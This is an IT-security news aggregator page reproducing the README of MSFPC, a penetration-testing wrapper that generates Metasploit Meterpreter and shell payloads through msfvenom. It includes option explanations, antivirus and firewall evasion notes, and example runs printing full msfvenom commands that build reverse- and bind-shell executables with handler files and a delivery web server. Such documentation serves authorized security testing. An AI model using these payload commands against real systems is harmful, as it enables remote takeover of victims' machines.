1. IT-Security >
  2. Cyber Security Nachrichten >
  3. MSFPC - MSFvenom Payload Creator

ArabicEnglishFrenchGermanGreekItalianJapaneseKoreanPersianPolishPortugueseRussianSpanishTurkishVietnamese

MSFPC - MSFvenom Payload Creator


IT Security Nachrichten vom | Direktlink: feedproxy.google.com Nachrichten Bewertung


A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).

About
MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.
Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).
The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
  • Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
  • Don't know what your external IP is? MSFPC will discover it: wan.
  • Want to generate one of each payload? No issue! Try: loop.
  • Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will NOT try to bypass any anti-virus solutions at any stage.


Install
  • Designed for Kali Linux v2.x/Rolling & Metasploit v4.11+.
  • Kali v1.x should work.
  • OSX 10.11+ should work.
  • Weakerth4n 6+ should work.
  • ...nothing else has been tested.
$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpc

Kali-Linux
MSFPC is already packaged in Kali Rolling, so all you have to-do is:
[email protected]:~# apt install -y msfpc

Help

$ bash msfpc.sh -h -v
[*] MSFvenom Payload Creator (MSFPC v1.4.4)

msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: msfpc.sh windows 192.168.1.10 # Windows & manual IP.
msfpc.sh elf bind eth0 4444 # Linux, eth0's IP & manual port.
msfpc.sh stageless cmd py https # Python, stageless command prompt.
msfpc.sh verbose loop eth1 # A payload for every type, using eth1's IP.
msfpc.sh msf batch wan # All possible Meterpreter payloads, using WAN IP.
msfpc.sh help verbose # Help screen, with even more information.

<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]< br/> + Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .dll]

Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
<MSF> payloads are generally much l arger than <CMD>, as it comes with more features.

<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STA GED> are 'better' in low-bandwidth/high-latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
https://www.offensive-security.com/metasploit-unleashed/payload-types/
https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
$

Example #1 (Windows, Fully Automated Using Manual IP)
$ bash msfpc.sh windows 192.168.1.10
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] IP: 192.168.1.10
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

[i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

[i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
$

Example #2 (Linux Format, Fully Automated Using Manual Interface and Port)
$ ./msfpc.sh elf bind eth0 4444 verbose
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] IP: 192.168.103.142
[i] PORT: 4444
[i] TYPE: linux (linux/x86/shell/bind_tcp)
[i] SHELL: shell
[i] DIRECTION: bind
[i] STAGE: staged
[i] METHOD: tcp
[i] CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
--platform linux -a x86 -e generic/none LPORT=4444 \
> '/root/linux-shell-staged-bind-tcp-4444.elf'

[i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

[i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
[i] Size: 4.0K
[i] MD5: eed4623b765eea623f2e0206b63aad61
[i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

[i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
[i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
$

Example #3 (Python Format, Interactive IP Menu)
$ msfpc stageless cmd py tcp
[*] MSFvenom Payload Creator (MSFPC v1.4.4)

[i] Use which interface - IP address?:
[i] 1.) eth0 - 192.168.103.142
[i] 2.) lo - 127.0.0.1
[i] 3.) wan - 31.204.154.174
[?] Select 1-3, interface or IP address: 1

[i] IP: 192.168.103.142
[i] PORT: 443
[i] TYPE: python (python/shell_reverse_tcp)
[i] CMD: msfvenom -p python/shell_reverse_tcp -f raw \
--platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
> '/root/python-shell-stageless-reverse-tcp-443.py'

[i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'

[i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
[i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
$
Note: Removed WAN IP.

Example #4 (Loop - Generates one of everything)
$ ./msfpc.sh loop wan
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] Loop Mode. Creating one of each TYPE, with default values

[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] IP: xxx.xxx.xxx.xxx
[i] PORT: 443
[i] TYPE: android (android/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p android/meterpreter/reverse_tcp \
LHOST=xxx.xxx.xxx.xxx LPORT=443 \
> '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

[i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

[i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
[i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!


[*] MSFvenom Payload Creator (MSFPC v1.4.4)

...SNIP...

[*] Done!

$
Note: Removed WAN IP.


To-Do List
  • Shellcode generation
  • x64 payloads
  • IPv6 support
  • Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)


...

Externe Webseite mit kompletten Inhalt öffnen



http://feedproxy.google.com/~r/PentestTools/~3/t136V2RB-ZE/msfpc-msfvenom-payload-creator.html

Team Security Social Media

➤ Weitere Beiträge von Team Security | IT Sicherheit

  • MSFPC - MSFvenom Payload Creator

    vom 1446.7 Punkte ic_school_black_18dp
    A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).AboutMSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.Fully automating msfvenom & Metasploit is the end goal (well as to be
  • Pixload - Image Payload Creating/Injecting Tools

    vom 411.97 Punkte ic_school_black_18dp
    Set of tools for creating/injecting payload into images.SETUPThe following Perl modules are required:- GD- Image::ExifTool- String::CRC32On Debian-based systems install these packages:sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
  • Graffiti - A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

    vom 304.74 Punkte ic_school_black_18dp
    NOTE: Never upload payloads to online checkersGraffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding: Python Perl Batch Powershell PHP Bash Graffiti will also a
  • SharpShooter - Payload Generation Framework

    vom 297.12 Punkte ic_school_black_18dp
    SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScr
  • Phantom Evasion - Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

    vom 292.34 Punkte ic_school_black_18dp
    Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antiviru
  • Phantom Evasion - Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

    vom 292.34 Punkte ic_school_black_18dp
    Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antiviru
  • XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder

    vom 289.5 Punkte ic_school_black_18dp
    All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDERWritten by Hulya KarabagInstagram: Hulya KarabagScreenshotsHow to useRead MeThis tool creates payload for use in xss injectionSelect default payload tags from parameter or write your paylo
  • XSpear v1.3 - Powerfull XSS Scanning And Parameter Analysis Tool

    vom 274.27 Punkte ic_school_black_18dp
    XSpear is XSS Scanner on ruby gemsKey featuresPattern matching based XSS scanningDetect alert confirm prompt event on headless browser (with Selenium)Testing request/response for XSS protection bypass and reflected(or all) paramsReflected ParamsAll params(f
  • Metasploit Cheat Sheet

    vom 206.08 Punkte ic_school_black_18dp
    The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures. Metasploit is a popular tool used by pentest experts. Metasploit :Search for module:msf &
  • Metasploit Cheat Sheet

    vom 206.08 Punkte ic_school_black_18dp
    The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures. Metasploit is a popular tool used by pentest experts. Metasploit :Search for module:msf &
  • Alternative input methods for Android TV

    vom 205.7 Punkte ic_school_black_18dp
    Posted by Benjamin Baxter, Developer Advocate and Bacon Connoisseur All TVs have the same problem with keyboard input: It is very cumbersome to hunt and peck for each letter using a D-pad with a remote. And if you make a mistake, trying to correct it compounds the problem. APIs like Smart Lock and Autofill, can ease user's frustrations, but for certain types of input, like login, you ne
  • Veil - Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

    vom 195.63 Punkte ic_school_black_18dp
    Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.Veil is current under support by @ChrisTruncerSoftware Requirements:The following OSs are officially supported: Debian 8+ Kali Linux Rolling 2018.1+ The following OSs are likely able to run Veil: Arch Linux BlackArch Linux Deepin 15+ Elementary Fedora 22+ Linux Mint Parrot Security Ubunt

Team Security Diskussion über MSFPC - MSFvenom Payload Creator